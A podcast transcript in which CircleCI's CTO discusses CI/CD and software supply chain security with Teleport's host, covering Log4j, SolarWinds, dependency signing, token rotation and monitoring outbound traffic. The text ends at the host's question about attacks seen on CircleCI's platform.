Securing CI/CD and the Software Supply Chain.
For this 14th episode of Access Control Podcast, a podcast providing practical security advice for startups, Developer Relations Manager at Teleport Ben Arent chats with Rob Zuber. Rob is a seasoned entrepreneur and along his startup journey, he ran into issues with mobile CI/CD. This led him to create Distiller, a CI/CD service focused on mobile devices. The Distiller team later joined forces with CircleCI, and Rob has been CircleCI's CTO for the last 7 years. CircleCI is a service that provides build and deployment infrastructure for modern apps. CirceCI is a hyper-growth startup that also supports many startups.
Key topics on Access Control Podcast: Episode 14 - Securing CI/CD and Supply Chain
- CI/CD stands for continuous integration, continuous deployment.
- With regard to software supply chain problems, as with other similar problems, there's always the question of how long have we known about something versus how long has it been happening.
- Continuous deployment is important for remediation because the length of time to push a deployment impacts the duration of exposure to a given security problem.
- The SolarWinds incident was caused by a compromised build server and involved sophisticated loading of a backdoor into the deployed Orion system.
- Prior to recent security incidents, traditional CI/CD's focused around image and artifact scanning. Securing Tokens and Build Infrastructure have been a key part of the solution to keep CI/CD secure.
- As companies string together a large number of tools, it's important for them to ask: What is the security model we have here? We'll discuss this in detail with this episode.
Expanding your knowledge on Access Control Podcast: Episode 14 - Securing CI/CD and Supply Chain
- Teleport 9 - Introducing Machine ID
- Highly Evasive Attacker Leverages SolarWinds Supply Chain to Compromise Multiple Global Victims With SUNBURST Backdoor
- Project Trebuchet: How SolarWinds is Using Open Source to Secure Their Supply Chain
- Teleport Machine ID
- Using Teleport Machine ID with Jenkins
Ben: 00:00:00.531 [music] Welcome to Access Control, a podcast providing practical security advice for startups, advice from people who've been there. Each episode, we'll interview a leader in their field and learn practices and practical tips to secure in your org. For today's episode, I'll be talking to Rob Zuber. Rob is a seasoned entrepreneur, and along his startup journey, he ran into issues with mobile CI/CD. This led him to create Distiller, a CI/CD service focused on mobile devices. The Distiller team later joined forces with CircleCI, and Rob has been CircleCI's CTO for the last seven years. CircleCI is a service that provides build and deployment infrastructure for modern apps. And CircleCI is also a hyper-growth startup, but also supports many startups, making Rob the perfect guest for today's episode. Hi, Rob. Thanks for joining us today.
Rob: 00:00:46.859 Thanks for having me. I'm excited to be here.
Defining CI/CD and its evolution over the past 5 years
Ben: 00:00:49.002 All right. To kick things off, I'll start with an easy one. What is CI/CD?
Rob: 00:00:53.403 That's a great question. And it feels easy sometimes, but it's a big story in its own right, so I'll keep it simple. CI/CD, first of all, stands for continuous integration, continuous deployment. Although sometimes we say continuous delivery, continuous deployment. Effectively, continuous integration is the practice of constantly integrating software that multiple members of a team are working on, all of the changes so that you can identify any issues, any conflicts as quickly and early as possible, avoiding late and complicated sort of merges or integrations down the line. And then continuous deployment is really taking that a step further, not just integrating the software, but pushing it out into a production environment or making it available to customers, which is both good validation of the correctness of the software, if you will, but also a great opportunity to get feedback. The sooner you put things in front of your customers, the sooner you can learn if the path that you're on is the right path. So build something really small, put it in front of customers, validate that it's actually useful or valuable to them, and then continue down that path or adjust your path. So both technical correctness and value to customer, the sooner we can learn on both of those fronts, the better off we are.
Ben: 00:02:11.767 Yeah. And then how has it sort of changed over the last 5 years?
Rob: 00:02:15.160 I think in the last 5 years, everything about how we deliver software has changed. So that's fundamentally changed how we build the tooling to support that. Right? So most notably, this is a little bit more than a 5-year arc, but I would say if we go specific to 5 years, 2017, I always say, is the year that Kubernetes won. At the time, coming into 2017, there were, what, five or six different container orchestrators, and everyone was trying to compete in that space, and everyone settled on Kubernetes. And over the course of 2017, everybody else became a wrapper around Kubernetes. But what's interesting is if you go 5 years before that, nobody needed a container orchestrator because no one even knew what a container was. Right? So the way we delivered software 10 years ago in the world of Chef and Puppet and sort of machine configuration changes, it's very different from a post Docker containerized world. And so what we build, how we package it, how we get it into a production environment has all fundamentally changed. And therefore, how we integrate, how we validate, how we push changes out, and deploy it into those environments has changed. Right? So from I'm modifying a binary in an existing machine, and then concerning myself with, "Is the state of that machine correct?" to, from a container perspective, I'm effectively throwing out the machine and replacing it with another one. We tried to do that with baking AMIs back in the day. But basically, the whole process of software delivery has changed as a result of the tooling that we've used underneath it.
Ben: 00:03:47.954 Yeah. I guess it's a real continuation of the pets for cattle was for infrastructure, but this is also for your code, too.
Rob: 00:03:54.424 Right. And I think it's actually, for all the topics that we want to get into, is a good thing because you have a snapshot of a much bigger piece of the system. So if you're shipping kind of the whole system, you think about it that way. You have the opportunity to validate that the whole system is good as opposed to the single binary that you're putting into an environment that may have changed around you.
When software supply chain problems became mainstream
Ben: 00:04:17.680 Yeah. And then sort of shifting gears, the last 2020, 2021 was also the year in which software supply chain became mainstream, leading with the solar flare incidents, and then there's also executive order providing the SBOM. Before we dive too deep into the specifics, why do you think these problems are just starting to appear now?
Rob: 00:04:39.296 Well, I think there's probably two facets to that. Right? There's always the question of how long have we known about something versus how long has it been happening. Some of these things will just be awareness. But also, as we fundamentally shift the ways in which we deliver software, we tend to do that because we want to either simplify or create leverage, whatever that might be. There are drivers for the types of changes that we make. But also every time we change the way we deliver software, we become less skilled at the thing that we're doing. Right? We have less awareness, less understanding of how software delivery works because we've just fundamentally changed the model of software delivery. And so that creates new openings. Right? I mean, security is often about awareness of what's happening, your ability to reason about the different kinds of opportunities and different kinds of surfaces that are exposed in how you're delivering software.
Rob: 00:05:40.306 And so as we change the ways in which we deliver software, we create new opportunities. Right? So I would say that is a real factor. And I said there was two, but I'll add a third, which is the whole concept of supply chain. The reason that the supply chain is probably more exposed now is — for me, I'd call it a 20-year arc. I often use that, but that's just the time I've been in the business. We've gone from writing almost every line of code that we are ultimately putting into a production environment to writing a very, very small fraction of that code, from even building out the systems, the machines — 20 years ago, we were all building our own data centers — to clicking a button, getting someone else's AMI on top of a machine - I couldn't even tell you where that machine is — to then taking a framework off the shelf, some open source framework that I put this tiny little fragment of code on top of, which is mostly me gluing together a bunch of people's open source libraries.
Rob: 00:06:37.515 So the opportunities and the exposures are very much not in my own software. Of course there's exposures in my software, but so much of it is in stuff that other people have written that I'm taking on good faith in a lot of circumstances. I think just the complexity is the enemy of understanding, usually. And so that complexity creates opportunity for things I can't see or understand, and that's an opportunity for security vulnerabilities.
Ben: 00:07:05.161 Yeah. And I guess that's kind of where the SBOM, which is the software bill of materials — I don't know if you can explain sort of how that's an important part of this supply chain?
Rob: 00:07:15.659 It's a great question. Right? Do I even understand all of the things that are rolling up into the software that I'm ultimately delivering? It's interesting for me. As a bit of backstory, I spent my first year out of college working in a factory, and we were building hardware, computer hardware. And so we had bills of material, I guess that's how you would pluralize that. So we would have that for every — because you needed to know —
Ben: 00:07:41.888 [inaudible]. Yeah.
Rob: 00:07:42.603 —this chip goes in this spot and you had to order the parts and all that kind of stuff. It was a very different, much more physical perspective of that. But the concept that you would build something without knowing all of the component pieces just wouldn't work. Right? Because you actually had these pieces coming in and out of the building basically on trucks versus in the world of software, so many of these components are imported without people paying a lot of attention. In particular, you end up with transitive dependencies. Right? So I am depending on a library, and that library is bringing in a whole bunch of other libraries, and I'm not necessarily paying attention to that. Right? I'm like, "Oh, you have a Facebook plugin. I will take your Facebook plugin, and now I can go work with Facebook." But I'm not considering, until the CVE start arriving, all of the other tools that you used to build that. Right? You see this because you have a conflict between two different transitive dependencies.
Rob: 00:08:40.326 One of my libraries imports this version of this, of, let's say, Log4j just for fun, because that's going to come up. Another one imports this other version, and they're not even compatible with each other. So as a developer, I'm frustrated because I have to go wrestle with these dependency issues. But I don't think until recently, because we've had enough issues, enough visibility into those, that people were really paying attention to the depths of these dependency trees and what they were bringing into their environment, again, just without even paying attention to who wrote this. Where did this even come from? I think left-pad is another great example. For anyone who doesn't know, it's an NPM module that got pulled by a developer who decided they just didn't want to work on it anymore and basically broke tons of node products because people didn't even — it's so easy to bring this stuff in — I guess is the best way of looking at it. Right?
Rob: 00:09:34.294 When you have a — going back to the - it's not really a metaphor, I guess it's a metaphor the other way - the physical bill of materials, you pay attention to the price and the supplier and the shipping time and all these things of every single component, and you try to minimize your exposure. But in software, it's so easy to just say, "Oh, someone wrote this thing. Someone wrote that thing. No problem. I'll just integrate them," and you expose yourself to that risk without — I think we just haven't had a history of paying attention to that.
Why continuous deployment counts for remediation
Ben: 00:10:00.238 Yeah. And I think once you've had the risk, there's all these sort of possible attacks. Can you sort of explain why continuous deployment is important for remediation?
Rob: 00:10:08.268 I think this is true not just in security, but everywhere. Failure is going to happen in some form or another. Right? Your failure might be you're exposed to a newly identified issue from a security perspective, a CVE or whatever in your stack or something you've built has created an exposure that you need to fix. And if you are not in a position to quickly update, the issue is now known. And so the attack window is from the point that it's been realized and published to the point that you've been able to remediate. Right? And often if you're the provider, let's say you're the — I'm going to keep using Log4j, but I guess the Apache Foundation, there's been notification, responsible disclosure, someone has gone and said, "Hey, we found this issue. You should probably fix it." But again, because it's supply chain, they didn't contact us. Right? We weren't actually particularly exposed to the Log4j issues.
Rob: 00:11:08.723 But no one contacted us and said, "Hey, by the way, this issue is going to come out before we actually notify publicly. You should go fix it." So we find out at the point that it's been made public. Now it's public and everyone says, "Oh, wow, there's this open window for this attack vector." So how much time do we have or how long does it take us to update all of our systems and remediate that? And if we have a continuously delivered meaning always ready to go to production system, and in our case, basically as soon as something is good, we push it into production, then that window is really, really short. Right? If we can say, "Oh, we upgraded this library," run the test and push it to production, for us, that's measured in minutes. And so good luck in those ensuing minutes finding a way to take advantage of that in our platform. If you're operating in the world that many of us were operating in 10 years ago, and probably some people still are, where it's three months to push a deployment to your production environment, that's a three-month exposure to that problem.
Rob: 00:12:10.362 And so now you're not going to accept the three-month exposure. What you're going to do is scramble and try to put together some bespoke process to patch all of your systems, which might solve the Log4j problem, if I continue as an example, but you're going to expose yourself to other production issues. Right? We just made a bunch of changes. We don't really have a good way of testing it. We're skipping the test cycle because it's so important that we get this out. So it's really having the confidence and the ability to upgrade at any given moment and know that that upgrade is good. And so for us, we're shipping hundreds of times a week, adding in another shipment is nothing.
Ben: 00:12:46.406 And then is there any cases beyond just blue-green deployments for urgent security fixes? What sort of approaches do you see for things should go out across the whole fleet immediately?
Rob: 00:12:56.527 The tooling to mitigate any other risk that's introduced is, again, not necessarily specific to this. And I think when you ask about being able to ship immediately, we kind of ship everything immediately. So the tools that we use are the same tools. And when you're using the same tools, you have a lot of confidence in those tools. We use them all day, every day to get software into production. Then doing something new is just doing the same thing. And so when we think about — blue-green is really about mitigating risk. Right? It's, I've introduced something new. I cut traffic over to one environment would be the old one that's green, the new one is blue. You kind of alternate back and forth. So I can cut over traffic. If something goes wrong, I take it back. There's many other tools for deployment that you can use for that. Feature flags are effective in introducing stuff, but being able to turn it back off. We use something called release orchestration, which is routing traffic to smaller subsets versus just a full cut over like a blue-green model. All of those approaches are viable. And any of those practices are going to give you the comfort and confidence to just put stuff out, know that it's good, and if something does go wrong, that you've managed the risk and you can pull it back.
The Solarwinds Orion SUNBURST Attack
Ben: 00:14:08.885 Yeah. That's a great answer. Another big one, which was the SolarWinds incident, was caused by a compromised build server. And then there was kind of sophisticated loading of a backdoor into the deployed Orion system. And I think FireEye has an excellent write-up that I'll put in the show notes. But I wonder if you can break down some ways in which people can sort of strengthen the build server? Also, I think the thing that's interesting with SolarWinds is it wasn't compromised via source code, but instead from a compiled asset.
Rob: 00:14:37.908 Look, that's super complex. There are a large number of things that happen in there to say, "Oh, do this thing differently and you'll be better off." But the reality is it's ultimately about understanding the thing that you put in versus the thing that came out. And so there are lots of steps along the way that you can take there, I think. If you're pulling in binary components, as you're describing, knowing the source of those, being able to — I'll say simple things like signatures, understanding signatures. There have been much simpler attacks that were about just pulling source off the internet and executing it without validating against the signature. Right? Something relatively straightforward. So let's start with the relatively straightforward things. As we talk about the fact that there's always going to be something, when you have state-sponsored actors who are investing years to try to find ways into your system, yes, you can improve the basics. At some point there's going to be some exposure, so you have to think about dealing with those exposures. Right?
Rob: 00:15:40.311 I think this is where a lot of zero trust sort of models come from is the assumption that someone is inside the system. Okay. Now how do I get the system to work anyway? How do I become resilient to that? Right? I think concepts like single-use tokens are really valuable for that. So if a token has been taken and used, it's identified to me that it's already been used. So I get some indication, at least, that I don't continue down the path. Again, there's multiple points within that system, but knowing that the thing that came into your system is the one that you expected often ties to signing and knowing what the source was. Right? And I think knowing, okay, we're using these secrets, how long do the — there're some pretty standard practices around rotation, but it gets even better as you get to sort of things like single-use tokens again. Anything that's going to give you a hint that something has changed or something is off, even if you don't know what it was, as long as that's the point where you say, "You know what? We're not going to let this continue."
Rob: 00:16:39.577 And again, if you go into the details, the amount of effort that was put into preventing those binaries from behaving in any unexpected way during the build process and sort of only turning on once they got into a production environment, that was a lot of energy. You have to think about how your system is constructed in order to be able to say, "Oh, this is the way that this would be noticeable," or "This is the way that this would be noticeable." But then how it behaves in a production environment is something else that you can pay attention to. Right? If things are making remote calls out to systems that they shouldn't be. I think a lot of us spend a lot of energy preventing inbound calls, but don't pay attention to the outbound calls. But if you have a nefarious actor inside your system, the outbound calls are going to be really interesting.
Ben: 00:17:27.437 Actually, yeah, Trevor Rosen of SolarWinds has a great presentation how they secured after the hack. And I think in his miscellaneous details, he says that their build service can only limit outbound connections to GitHub. On a sort of follow-up question, what's your thoughts around perimeter security?
Rob: 00:17:43.905 Perimeter security is interesting. We're sort of reflecting on perimeter security and saying, "We can't just hold people at the perimeter." Right? What do we need to do to have defense in depth? What do we need to do to make sure that at every layer there are additional levels of protection? That doesn't mean we should have a Swiss cheese perimeter, but we shouldn't assume that no one's going to get through. So then what's interesting actually about that is it's more about, again, outbound. Not I'm blocking people from getting into my system, but rather I'm using the complete perspective of the system. Something is generating traffic to a destination that I wouldn't have expected. Blocking it is interesting, but identifying it is even more interesting. Because if I just block outbound — again, in the case of the SolarWinds thing, if I block outbound traffic, but that thing still is embedded and gets out into my production systems, then it's my production system problem that's different. And that's not trying to connect to GitHub,; it's trying to connect to wherever it's reporting information out to or whatever. Right?
Rob: 00:18:40.766 So I think the basic assumption that the perimeter on its own isn't good enough and that it's not just that I'm blocking, but I'm paying attention to every behavior. It might be system calls. It might be network calls. What's happening inside of this environment and did I expect it is a great way to identify anything out of the ordinary. And that's a really weird and broad statement, but if something's happening in my build that I didn't expect, I want to pay attention to that.
Ben: 00:19:10.247 Yeah. And I think that's the interesting thing about the Log4j is basically it would communicate to any LDAP server on the internet.
Rob: 00:19:16.605 Well, not just communicate with it, but fetch code from it and execute the code. I mean, when you say it out loud, it sounds ridiculous, but if you were writing Java software in the late '90s, early 2000s, I think it sounded amazing. Right? We were trying to build great abstractions. We were trying to make dynamic systems. And probably the mindset or the mind space of even the system we were building and how it was configured and what you might do with that was very, very different from how it's now being applied today. Yes. To say it out loud, you're like, "Why would I ever allow one of my libraries to execute arbitrary code?" That sounds like a terrible idea from the get-go. But if you take a perspective with a little bit more empathy and throw yourself back into that time and space, it might make a ton of sense. I mean, this was a time when we were writing — I don't remember the names, but we did a lot of object serialization over the network and stuff like that. Those felt like good practices, and we were still trying to figure out how to do distributed systems. And so it's an interesting point to say, what other tools are we using that were conceived in that era where these types of approaches would seem sensible or reasonable? Right? I think it's always a failure of imagination to look at one issue and conclude that it's constrained to that issue. You know what I mean? Yes, the Log4j issue is a big, scary issue, and we should all deal with upgrading our libraries and whatever, but it's more interesting to ask, what was the mindset and what else did we build when we had that mindset? And are those things still out there? And when is that zero day CVE whatever coming down? And can we prevent it?
Ben: 00:20:59.560 Yeah. And I guess that goes back to your containerization, rapid delivery, and sort of Kubernetes, people who haven't quite got there in their organization yet. There's all these other benefits that come with it just by updating their processes that now, you can probably make continuous deployment easier.
Rob: 00:21:15.346 Yeah. Absolutely. I think that the tools that we now have made all of these capabilities easier. This is only audio, but I'm going to air quote, "easier". We've taken a bunch of complexity incidentally in order to solve other complexities. Right? So we have to pay attention to where the complexity is going. And as I said earlier, complexity is the enemy of understanding. Right? So the more we can simplify our systems, the better off we're going to be. Those tools have allowed us to do things that we couldn't do before. So that's great. And give us the capability to say, "Well, yep, there's another security issue. We probably could have seen that one coming. Now it's here and we're going to upgrade this library and click this button and then we're good. Right? It's going to be solved in our environment and we can go back to work versus the panic. Right? The panic of, oh my goodness, where is this thing in our system? How on Earth are we going to find all the places where it exists in our system? And how are we going to fix that at the rate that we discover software issues in general? Especially speaking of the stack of everyone else's software that we're using, if it's not automated to just deal with it, we would spend all of our time just fixing and updating dependencies where people are finding security issues. Right? So I think having that tooling is just an opportunity to then stay focused on the work you're trying to get done.
The current state of image scanning tech
Ben: 00:22:42.199 And then I guess zooming out of it, before all of these sort of more recent incidents, I remember CI/CD's main focus was around sort of image and artifact scanning. That was sort of the security bolt-on feature. And a lot has sort of changed, I think it's last five years as a few companies. But what sort of the current state of image scanning tech? And what do you see coming next?
Rob: 00:23:01.290 Kind of to that point, image scanning, library scanning, dependency checking, tat's the table stakes, if you will, of security. And it's certainly critical. I mean, if you're still shipping software that has year-old known security issues, then you're not in a great place. But it's not everything. Right? The bar is being raised in terms of attackers. Right? I guess security is always a bit of a cat and mouse game. Every time we build a decent set of defenses, someone else is going to try to build a better set of, I don't know, attacks, I guess. Right? So, yes, you should absolutely be scanning because those known vulnerabilities, everybody knows how to take advantage of them. And if you're putting that out in production, you get the Equifaxes of the world. Right? Just known issues that are sitting out and production people take advantage of them.
Rob: 00:23:56.186 But beyond that, some of the things we talked about already, like ensuring that everything you're using from the outside is trusted and known to back to the source. Right? So how can you enforce that in terms of basic things like checking signatures, checking sources, checking if anything is leaving the system that you didn't expect to be leaving the system? So constraining within your environment. How you even manage within that. I mean, this is probably very specific to us because we run multi-tenancy, but how we isolate environments within the platform is obviously something we spend a lot of — maybe it's not obvious, is something we spend a lot of time on ensuring that with each tenant is basically isolated to their own environment. And then we recently launched something called IP ranges, which is really about ensuring that if our system is talking to your system, you know the source, you know that it's your build, not someone else's build that's connecting in.
Rob: 00:24:50.811 As we work with more and more — it's not even necessarily tied to CI and CD specifically. But as we all work with more and more third-party vendors, whether it's just third-party services, we tend to be stitching together platforms versus entirely building platforms, again, ensuring that we truly have the trust of that provider. Right? We know that we're still getting the link to the right source or destination that we know that is the provider that we're signed up to work with, not someone else who's trying to step in the middle and capture things. I think it's almost gotten too easy.
Ensuring trust between machines
Ben: 00:25:27.056 Yeah. And what have you seen, well, for this sort of, let's say, machine to machine communication? How do you ensure trust between two machines, one, I guess another vendor and your own one?
Rob: 00:25:37.758 I don't think that the practices have changed significantly in terms of whether it's addressing, whether it's certificate exchange, OAuth token models, whatever it might be. I think that what has changed is — and maybe this is just my time in the industry — I don't think we're as paranoid as we used to be, and I think we need to get as paranoid as we used to be. There was a point, I guess, a little bit post wouldn't it be cool if we could do remote procedure invocation or remote method invocation. That's what I was trying to think of earlier in Java. Right? That sounded great. And then at some point we said, "Wait a second, we're calling methods of another machine. How do we have trust in that machine?" And we spent a lot of time thinking about that. And now, I think we assume that whatever provider we're using has thought it through. Oh, okay. They have OAuth, and OAuth is known to work. Therefore, this is going to be great. Right?
Rob: 00:26:32.094 But it's so easy to string together a very large number of tools. And I think it's important that as we're doing that, we look at it and say, "Okay. What is the security model that we have here? How can we think about that security model? And how well does that work with our system? Where are the opportunities? Where are the exposures here?" And it might just be we're making sure that we're using certificates in both client and service side certificates, I mean, random examples. But whatever it might be, are we really consciously thinking about that? I mean, we spend — basically every quarter, we have a third party come and do pen testing of our system, and we target them in different areas. But that kind of — some folks have kind of Red Hat or whatever Red teams internally to look at, okay, if I was on the outside with limited but decent knowledge of how the system works, what approaches would I have? Right? And I just think all of that is a mindset that sometimes as developers, it's easy to gloss over. I got a lot going on. It would be really great if I could just use this third party and use this other library because it saves me time, and that is ideal. Right? We want to ship value to customers, but say — just taking that minute, the thought experiment, like what are the boundaries of where this is secured and where it's not? And how confident am I in this? I think we've just lost a little bit of that paranoia, and some of these events will probably bring it back.
Ben: 00:27:56.089 I know. I mean, I used to run an exception tracking service, and in the early days, people would send in their stack trace. You'd get the environment variables, which is kind of an example. You don't know which third party is dumping whatever to you.
Rob: 00:28:10.086 Exactly. We take these libraries often not really sure what they're doing. And so then saying, "Okay. Well, if I had a library and it had access to everything in my system, how could I make that okay?" Right? It's an interesting question to ask. How can I ensure that all these tokens that exist in my build environment are useless for anything else? It's a great question to ask. Right? And then say, "Okay. Well, this is how I'm going to build it." And then that gives you that opportunity to then not even worry about it. Right? Versus, "Oh, we accidentally put a token in source control." I mean, this is a thing that happens all the time. I think there's entire scanners dedicated to looking for the AWS formatted tokens in GitHub or whatever because people do that by accident all the time. And so the question is, well, how do I make it so that token doesn't really matter? Right? How can I have this stuff — and then once I've done it, yes, you can remove it from GitHub, but I promise you, someone has already found it. So how do I make it so I can rotate those things very quickly?
Rob: 00:29:08.190 We talked about changing source, right, but all of your token management should be in the same bucket, meaning, oops, we leaked a token, click, that's irrelevant. Right? Versus we've leaked it, and now everyone in engineering has to stop their work so we can go figure out how to deal with this.
Ben: 00:29:25.255 Pull you guys back to DevOps or the dev stack up. Just giving developers tools to make that automation easier and not having to file a ticket or do some scary process that no one wants to rotate the token because they're not quite sure where it is. You just make it sort of part of your day to day.
Rob: 00:29:38.649 Right. And then you get to the point where you're rotating them so often, it doesn't even matter. I think that whole — you mentioned DevOps, that whole notion of if something is painful, just to do it more until you've gotten to the point where it's really easy to do. It really helps reduce your exposure because things are going to go wrong. Some piece of software you're using is going to have an error. Someone is accidentally going to put a token in a place where it's public. This happens. You can't just stand around yelling at people until they stop doing it. You're going to stress them about. They're going to probably publish more of them. Right? There's no human solution to that. So how do you build a system that's resilient to those things? And it only happens when you accept that these things are going to happen, these issues are going to occur. What we need is tools that allow us to fix them.
Best practices for securing secrets
Ben: 00:30:23.574 Yeah. And then have you got any other best practices of dealing and sort of securing secrets, I guess, both internally and for your customers?
Rob: 00:30:30.954 We provide tools within our environment for managing secrets within the build. We also integrate some of the tools from AWS to do machine level authentication so that you don't have as many powerful secrets basically floating around in the first place. I think internally, probably nothing surprising, but again, I refer to single-use tokens, rotating things using tools like Vault from a HashiCorp. It's one of these areas where people have done great work to get us good tools, and so we try to use those versus come up with our own systems. There's a few things that are specific to how stuff gets run through a build, but overall, in terms of how we look at secrets, again, be able to rotate them and get to the point where rotating is happening automatically and then your surface area is just greatly reduced.
Ben: 00:31:18.492 Yeah. One thing we notice at Teleport, which provides sort of access to people's infrastructure, is that there's also auditing around sort of people accessing machines. But developers are pretty savvy. So if they want to go around, they can just go about, upload a script, and then do whatever they want to do. You could deploy script and find out damage. Sort of how important, sort of going back to some of the other questions, is it around to know what's happening between machine to machine and how do you sort of instrument and what is happening in those systems?
Rob: 00:31:49.253 Similarly to something we were talking about before, the reality is we pay a lot of attention to humans, but don't necessarily have the view that we think we have. I guess that's probably the place that I would land on that is we think we have really good understanding of what everyone's doing, but most attacks have demonstrated that we don't. Right? Like someone was in the system somewhere and we found that out later. So how important is it to understand what machines are doing amongst each other, what's being run on a system? I think it's critical. I mean, anything that doesn't look normal is something that you would want to know about, or doesn't look expected, I guess, is the best way to describe that. Whether it's network access between machines, whether it's just volume of data moving between machines. I mean, for us, that could be one of two things, like just the system is behaving poorly or someone's driving the system to do something unexpected. But both of those are interesting.
Rob: 00:32:50.220 So I should be looking for outliers in terms of anomalous behavior, whether it's, again, network traffic over a particular port that I wasn't expecting or volume of traffic moving across something, whether it's high or whether it's low. That tells me that something is different in the system. And again, it might just be something's not behaving correctly, and that might be impacting our customers. So, of course, I want to know about that right away. Or it might be, as you said, someone's executing a script that's doing something unanticipated like collecting a bunch of data back down to a machine or something like that. If it's something that's impacting our customers, I care about that. If it's not, then there's probably something else that I want to know. And so anything that I can understand about that, which it might come from, again, logging network access, logging anything that's happening in the machine, basics like — I love that every time I use sudo, it tells me that this event is going to be logged, and it's on my laptop, and I sort of have a laugh about it.
Rob: 00:33:48.794 But in a production environment, I actually want to know about that. I want to know who logged into the system, why they were escalating their privileges, what was happening in that environment. So I think it's probably hard to say in advance, oh, if this thing occurs, that means there's a security problem. Right? It's a little bit like the problem, again, of just production systems. I don't know what's going to be different, but I want to know if something is different and have the tools to be able to say, "Oh, it was this person who did this thing," as basics. Why people have individual accounts on systems instead of everyone having a shared account in a production system. Right? I want to know who got onto the system, were they authorized to get there. I want to be able to pull people's access as soon as they leave the company, for example. These are basics, but not everyone follows them. It's like, "Oh, we'll just have a shared machine user, and we'll use that." Now when someone leaves, we have to rotate the key for everybody. And to the previous point of rotating keys, everyone's like, "I don't even know where that is. I don't know how to change it. Oh, that'll break this person's workflow. This other automated tool will break." So separate your automated systems from your people and then pay attention to what's happening. Of course, it happens in massive volume, so have tools, right, to look at logs to identify things that are happening that look like patterns that are out of the ordinary. But absolutely, anything that's an outlier, I want to know about.
Integrity of build infrastructure and vendoring libraries
Ben: 00:35:06.610 Going back a bit to more I guess the CI/CD, we talked a little bit about checking the integrity of build infrastructure, we talked a little bit about build artifacts, and then also vendoring libraries. I guess I think Golang is pretty easy to easily vendor your libraries. But do you have any sort of thoughts on these two topics?
Rob: 00:35:25.160 Yeah. I mean, I think that it's validation. Right? How do I build trust for the things that I'm pulling in? And there are some default tools, but there's probably lots of gaps in the ecosystem. And I think it's a place that we can help as a provider. But at some point, our customers have access to the shell. We can try to help them by pointing towards good tools and practices, but if you choose to execute something within your build environment that you haven't checked and is totally uncontrolled, I think the advent of downloading a shell script and piping it to sudo as a quick tool to get something done is one of the most disappointing things that's happened in software development in the last 10 or 20 years. And so at some point, we can't stop people from doing things like that; we can just try to educate. And I think there's places in the ecosystem for sure, like how package managers work is a great opportunity to say, "Okay. We're going to get this version of this library, but we're going to use the following tools to make sure that it's known to be good." And I think, yeah, I keep talking about signatures. It doesn't have to be that hard, but you have to do it.
Ben: 00:36:33.544 Yeah. I guess the script is an example. It's one step or four steps. Take time to automate the four steps into one step to make your life easier.
Rob: 00:36:41.684 Right. Exactly. And I think that it's solvable. It's all solvable. Well, the basics are solvable. Right? And then it's, what's going to happen next? So then I think the other perspective that I'm always interested in, and, I mean, I don't have a canned solution, but I think we all need to think about it, is if we assume that there's always another vector and that someone is able to do something malicious in this environment, how do we make it so that doesn't matter? And I think it's a great framing, at least, to take a different perspective or different angle and say, "Okay. We can make it so that it just doesn't matter if there's activity in this environment," or "There's always another level of check sort of thing that passed this system is going to prevent this thing from perpetuating."
Ben: 00:37:27.716 Yeah. It's kind of like a smoke test or something.
Rob: 00:37:30.350 Yeah. I think going back to SolarWinds and some of these other cases, it's not that one piece of software was infiltrated, it's that was then distributed kind of everywhere. The reach was so great. And so what's the check at that next stop that says, "Oh, okay. Yeah. Even if that happened, it wouldn't get outside of this box."?
Improvements in notarization and final distribution of on-prem package software
Ben: 00:37:51.239 Yeah. I think the one interesting thing, so we have our software go on-prem, and we've notarized both our Mac and Windows binaries. And the one interesting thing, kind of hilarious, I've found, if you pay Microsoft $1,000 a year, your code signing dongle automatically pass Windows Defender, and so it doesn't have any other checks. If you pay $100, it goes through some sort of AI to figure whether it's a trustworthy binary or not, doesn't show you an alert. But if you need the code signing dongle, it also requires a hardware token. So automation is kind of difficult in a cloudy world. So it needs to be on someone's machine, which is also a bad practice if you don't have AWS. Have you seen any improvements in this space around sort of notarization and that final distribution of sort of on-prem package software?
Rob: 00:38:36.944 I mean, it's not something that we deal with a ton other than — you talked in the intro about the mobile days, right? And a big part of mobile deployment is typically signing software for that purpose. I'll say one of the reasons that we were able to win customers as a mobile CI/CD platform was that automating that process was really, really hard and we had to jump through a bunch of hoops to make it work. So I wouldn't say that I've necessarily seen improvements. I think you're identifying the key tradeoff, which is, how confident am I that no one's been in this environment and able to manipulate it versus how can I do it in a way that I can get the job done and I don't introduce these other risks? Right? Knowing that this one trusted person was the person who did this thing is probably great from a security perspective, although no one can truly be trusted on their own. On the other hand, only having one person who could ship the software is everybody's nightmare. It's the thing that we're saying constantly, "Automate it so anyone can press the button," sort of thing. Right? So one of the tools that we use just within our own platform is this concept of restricted context. Basically, there are certain steps that someone needs to show up and validate and say, "Okay. I approve this to go through the next stage," and then they have escalated privileges for that particular step. And so I think there's some opportunities to make those things mostly work, but still be secure. And then you could have maybe a group of people who can do that. But I think that that trade-off is tricky, and I think that, "We'll just tie it to your hardware bottle," is not a good one for large-scale organizations. You have this one magic hardware key — is a difficult thing to scale, for sure.
Ben: 00:40:21.391 Yeah. So sort of taking the concept like pull request or pull approval requires multiple people to approve it to make it go through, stopping the two- or four-person rule.
Rob: 00:40:32.017 Yeah. I think multiple people. I mentioned Vault earlier, and I forget the name of the algorithm, but there's sort of this access to unlock, it requires multiple different keys. And it can be a few of a group of keys, which is a cool concept that I guess I learned from that product. But saying, "Okay. I need two of three signatures or three of five," or something like that is a powerful model for something that really needs that level. And then you have to ask the question, what's my exposure here versus here? How often am I going to use that set of tools? Because it is going to create overhead at some point. At some point, I'm trying to ship software, and the footprint or risk of that particular piece of software might be quite low. I don't need to pull all the tricks out of the bag for that one. But this thing over here — I'm trying to think of an example, but it might be your payment system versus something else within your platform. Right? Like who has access to the bank account? Very important. Who has access to our customers source code as a CI and CD provider? Very important. But there are definitely other pieces of the platform that can be isolated. And so that's an interesting question as well, like, can you isolate these systems even from each other such that you can reduce even the number of places where the exposure is high?
Types of attacks witnessed on the CI/CD platform
Ben: 00:41:49.160 Yeah. And so as an operator of a CI/CD platform, I guess you have to be a target for hackers. I've always found hackers to get creative when they have a few hours of free compute. Apart from just people running crypto miners, what sort of other attacks do you see on your platform?
